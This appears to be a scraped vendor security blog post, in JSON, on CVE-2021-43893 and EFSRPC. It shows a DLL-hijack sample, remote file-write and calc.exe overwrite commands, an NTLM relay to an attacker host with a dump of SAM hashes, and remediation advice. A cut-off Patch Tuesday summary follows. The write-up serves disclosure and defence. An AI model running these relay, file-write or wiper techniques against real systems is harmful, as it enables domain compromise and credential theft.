\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-'\"`-0-0-' \n \n PoC to elicit machine account authentication via some MS-EFSRPC functions\n by topotam (@topotam77)\n \n Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN\n \n \n \n [-] Connecting to ncacn_np:10.0.0.5[\\PIPE\\efsrpc]\n [+] Connected!\n [+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d\n [+] Successfully bound!\n [-] Sending EfsRpcOpenFileRaw!\n [+] Got expected ERROR_BAD_NETPATH exception!!\n [+] Attack worked!\n \n\nNot only did Microsoft fail to patch the issue, but they didn\u2019t issue follow-up patches for months. They also haven\u2019t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA\u2019s [Known Exploited Vulnerability Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n\n\nIn December 2021, Microsoft released a patch for a different EFSRPC vulnerability: [CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>). As part of the remediation for that issue, [Microsoft implemented](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use [`RPC_C_AUTHN_LEVEL_PKT_PRIVACY`](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/425a7c53-c33a-4868-8e5b-2a850d40dc73>) when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.\n\n\n\nAt the time of the December patch, PetitPotam didn\u2019t use this specific setting. However, a quick [update](<https://github.com/topotam/PetitPotam/commit/c3accf0875729ffabac13692841e0a671f96d0f2>) allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.\n\n## CVE-2021-43893: Windows EFS remote file upload\n\nJames Forshaw\u2019s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam\u2019s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: `\\\\.\\C:\\`. Using a UNC path that points to the victim\u2019s local file system allows attackers to create files and directories on the victim file system.\n\nThere are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That\u2019s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.\n\nSecond, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. `C:\\ProgramData\\`). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn\u2019t guaranteed, there are many plausible scenarios that could lead there.\n\n### A plausible scenario leading to RCE using CVE-2021-43893\n\nMy interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can\u2019t yet share the LPE as it\u2019s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.\n\nMicrosoft has long maintained that Microsoft services vulnerable to [DLL planting](<https://itm4n.github.io/windows-dll-hijacking-clarified/>) via a world writable `%PATH%` directory are **[won\u2019t-fix](<https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/>)** low-security issues \u2014 a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable `%PATH` to escalate privileges via a Windows service ([MITRE ATT&amp;CK - Hijack Execution Flow: DLL Search Order Hijacking](<https://attack.mitre.org/techniques/T1574/001/>)) is a useful technique when it\u2019s [available](<https://github.com/rapid7/metasploit-framework/blob/1499b1988e0f6c6cb541e715cf7a3dc43d5563f3/modules/exploits/windows/local/srclient_dll_hijacking.rb>).\n\nThere\u2019s a well-known product that installs itself into a world-writable directory: [Python 2.7](<https://www.python.org/downloads/release/python-2718/>), all the way through it\u2019s final release 2.7.18.\n \n \n C:\\Users\\administrator>icacls.exe C:\\Python27\\\n C:\\Python27\\ NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(F)\n BUILTIN\\Users:(I)(OI)(CI)(RX)\n BUILTIN\\Users:(I)(CI)(AD)\n BUILTIN\\Users:(I)(CI)(WD)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nThe Python 2.7 installer drops files into `C:\\Python27\\` and provides the user with the following instructions:\n \n \n Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows\u2019 default):\n \n C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\Python25\n \n Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.\n \n\nFollowing these instructions, we now have a world-writable directory in `%PATH%` \u2014 which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in `C:\\Python27\\`. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching [procmon](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). I found a number of services will search `C:\\Python27\\` for:\n\n * fveapi.dll\n * cdpsgshims.dll\n\nTo exploit this, we just need to drop a \u201cmalicious\u201d DLL named `fveapi.dll` or `cdpsgshims.dll` in `C:\\Python27`. The DLL will be loaded when a vulnerable service restarts or the server reboots.\n\nFor this simple example, the \u201cmalicious\u201d dll just creates the file `C:\\r7.txt`:\n \n \n #include <Windows.h>\n \n HANDLE hThread;\n DWORD dwThread;\n \n DWORD WINAPI doCreateFile(LPVOID)\n {\n HANDLE createFile = CreateFileW(L\"C:\\\\r7.txt\", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);\n CloseHandle(createFile);\n return 0;\n }\n \n BOOL APIENTRY DllMain( HMODULE, DWORD ul_reason_for_call, LPVOID)\n {\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);\n break;\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n }\n \n\nAfter compiling the DLL, an attacker can remotely drop the file into `C:\\Python27` using CVE-2021-43893. The following is the output from our [refactored and updated version](<https://github.com/jbaines-r7/blankspace>) of Forshaw\u2019s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):\n \n \n C:\\ProgramData>whoami\n okhuman\\lowlevel\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Python27\\fveapi.dll -i ./dll_inject64.dll\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Python27\\fveapi.dll\n [+] Encrypt the empty remote file...\n [+] Reading the encrypted remote file object\n [+] Read back 1244 bytes\n [+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream\n [+] Decrypt the the remote file\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe attack yields the desired output, and the file is written to C:\\Python27\\ on the remote target.\n\n\n\nBelow is the Procmon output demonstrating successful code execution as `NT AUTHORITY\\ SYSTEM` when the \u201cDFS Replication\u201d service is restarted. Note that the malicious DLL is loaded and the file \u201cC:\\r7.txt\u201d is created.\n\n\n\nDo many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn\u2019t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.\n\n### What can a higher-privileged user do?\n\nOddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw\u2019s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn\u2019t investigate why.\n\nHowever, it is interesting to note that the administrative user can remotely overwrite all files. This doesn\u2019t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort [wiper](<https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/033/904/original/Talos_WiperWhitepaper.v3.pdf?1525893980>) or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.\n \n \n C:\\ProgramData>whoami\n okhuman\\test_admin\n \n C:\\ProgramData>.\\blankspace.exe -r vulnerable.okhuman.ninja -f \\\\.\\C:\\Windows\\System32\\calc.exe -s \"aaaaaaaaaaaa\"\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja\n [+] Attempting to write to \\\\.\\C:\\Windows\\System32\\calc.exe\n [+] Encrypt the empty remote file...\n [-] EfsRpcEncryptFileSrv failed with status code: 5\n \n C:\\ProgramData>\n \n\nAs you can see from the output, the tool failed with status code 5 (Access Denied). However, `calc.exe` on the remote device was successfully overwritten.\n\n\n\nTechnically speaking, this doesn\u2019t really represent a security boundary being crossed. Administrators typically have access to \\host\\C$ or \\host\\admin$, but the difference in behavior seemed worth mentioning. I\u2019d also note that as of February 2022, administrative users can still do this using `\\\\localhost\\C$\\Windows\\System32\\calc.exe`.\n\nForshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user\u2019s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn\u2019t investigate that any further, but it could be useful in the correct environment.\n\n### Forced authentication still not entirely patched\n\nThe December 2021 patch brought multiple changes to `efslsaext.dll` and resulted in partial mitigation of [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>). One of the changes was the introduction of two new functions: `EfsEnsureLocalPath` and `EfsEnsureLocalHandle`. `EfsEnsureLocalPath` grabs a HANDLE for the attacker provided file using [CreateW](<https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew>). The HANDLE is then passed to `EfsEnsureLocalHandle`, which passes the HANDLE to `NtQueryVolumeInformationFile` to validate the characteristics flag doesn\u2019t contain [FILE_REMOTE_DEVICE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/616b66d5-b335-4e1c-8f87-b4a55e8d3e4a>).\n\n\n\nBecause the patch **still** opens a HANDLE using the attacker-controlled file path, EFSRPC _remains_ vulnerable to forced authentication and relay attacks of the machine account.\n\nDemonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:\n\nThe Relay (10.0.0.3): A Linux system running `ntlmrelayx.py`. \nThe Attacker (10.0.0.6): A fully patched Windows 10 system. \nThe Victim (10.0.0.12): A fully patched Windows Server 2019 system.\n\nThe only caveat for this example is that the victim\u2019s machine account (aka [computer account](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/service-accounts-computer>)) is assigned to the `Domain Admins` group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of `Domain Admins`.\n\n\n\nThis may not be a common configuration, but it\u2019s common enough that it\u2019s been the subject of a [couple](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts>) [excellent](<https://pentestlab.blog/2022/02/01/machine-accounts/>) writeups.\n\nThe attack is launched by a low-privileged user on 10.0.0.6 using the `blankspace.exe` proof of concept. The attack will force 10.0.0.12 (yet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3\n \n \n C:\\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\\\10.0.0.3\\r7\\r7 --relay\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to yeet.okhuman.ninja\n [+] Sending EfsRpcDecryptFileSrv for \\\\10.0.0.3\\r7\\r7\n [-] EfsRpcDecryptFileSrv failed with status code: 53\n [+] Network path not found error received!\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe Linux relay is running [ntlmrelayx.py](<https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>) and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see `ntlmrelayx.py` capture the authentication and send it on to 10.0.0.6.\n \n \n albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support \n Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation\n \n [*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6\n [*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED\n \n\nThe relay is now authenticated to 10.0.0.6 as `YEET$`, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.\n \n \n [*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4\n [+] Saving remote SAM database\n [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\n [+] Calculating HashedBootKey from SAM\n [+] NewStyle hashes is: True\n Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::\n [+] NewStyle hashes is: True\n albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::\n [*] Done dumping SAM hashes for host: 10.0.0.6\n \n\nIt\u2019s as easy as that. All you have to do is find a host with a machine account in the domain admins group:\n \n \n C:\\ProgramData>net group \"domain admins\" /domain\n The request will be processed at a domain controller for domain okhuman.ninja.\n \n Group name Domain Admins\n Comment Designated administrators of the domain\n \n Members\n \n -------------------------------------------------------------------------------\n Administrator test_domain_admin YEET$\n The command completed successfully.\n \n \n C:\\ProgramData>\n \n\nOnce you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn\u2019t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.\n\n\n\n## Final thoughts and remediation\n\nWhat began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn\u2019t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.\n\nTo mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: [Microsoft Security Advisory 974926 \n](<https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/974926>) and [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.\n\nSome other general advice:\n\n * Monitoring for [event ID 4420](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) in Windows application event logs can help detect EFSRPC-based hacking tools.\n * Monitor for [event ID 4624](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624>) in Windows security event logs for remote machine account authentication.\n * Audit machine accounts to ensure they are not members of Domain Admins. \nIf possible, audit %PATH% of critical systems to ensure no world-writable path exists.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-43893/>) available in the December 15, 2021 content release.\n\nMetasploit Framework users can test their exposure to forced authentication attacks with a new [PetitPotam](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb>) module available in the 6.1.29 release.\n\n_**Additional reading:**_\n\n * _[PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)_\n * _[Driver-Based Attacks: Past and Present](<https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Ongoing Exploitation of Windows Installer CVE-2021-41379](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T15:30:52", "type": "rapid7blog", "title": "Dropping Files on a Domain Controller Using CVE-2021-43893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43217", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-02-14T15:30:52", "id": "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "href": "https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T00:48:57", "description": "\n\nThe second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft\u2019s product families. Despite that, there\u2019s still plenty to discuss this month.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 28 \nESU | 14 \nMicrosoft Office | 11 \nBrowser | 9 \nDeveloper Tools | 8 \nMicrosoft Dynamics | 2 \nExchange Server | 2 \nAzure | 2 \nSystem Center | 2 \n \n### Exploited and Publicly Disclosed Vulnerabilities\n\nOne zero-day was announced: [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) is a privilege elevation vulnerability affecting the Win32k component of Windows 10 and Windows Server 2019, reported to be exploited in the wild. Four vulnerabilities have been previously disclosed: [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), a privilege elevation vulnerability in Windows Installer, affecting all supported versions of Windows; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), which is a denial of service (DoS) affecting Windows 10 and Server 2019; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information disclosure vulnerability affecting DirectX in Windows 10 and Server 2019; and [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>), an RCE in .NET Core.\n\n### Vulnerabilities in Windows TCP/IP\n\nMicrosoft also disclosed a set of [three serious vulnerabilities](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) affecting the TCP/IP networking stack in all supported versions of Windows. Two of these ([CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>)) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) is specific to IPv6 link-local addresses, meaning it isn\u2019t exploitable over the public internet. [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>), however, does not have this limitation. The third, [CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>), is a DoS vulnerability that could allow an attacker to trigger a \u201cblue screen of death\u201d on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August, 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\" by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure continued business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of which (CVE-2021-21017), has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | 